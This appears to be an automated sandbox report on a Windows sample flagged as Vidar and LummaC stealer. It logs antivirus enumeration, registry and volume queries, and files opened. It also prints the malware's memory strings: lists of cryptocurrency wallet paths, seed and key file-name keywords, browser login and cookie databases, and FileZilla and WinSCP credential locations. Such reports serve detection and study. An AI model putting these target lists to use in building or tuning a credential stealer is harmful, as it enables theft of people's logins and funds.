Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	4_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	4_2_0042E6A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\FBFHJJJDAF.exe	Queries volume information: C:\ProgramData\FBFHJJJDAF.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\FIEHIIIJDA.exe	Queries volume information: C:\ProgramData\FIEHIIIJDA.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

4_2_0041C0E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

4_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

4_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3154731112.000000000102A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 4.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3465570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3465570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6696, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: RegAsm.exe, 00000004.00000002.2770019694.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6696, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2680623811.0000000003455000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 4.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3465570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3465570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2053339176.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2770019694.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6696, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C270C40 sqlite3_bind_zeroblob,	4_2_6C270C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C270D60 sqlite3_bind_parameter_name,	4_2_6C270D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C198EA0 sqlite3_clear_bindings,	4_2_6C198EA0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
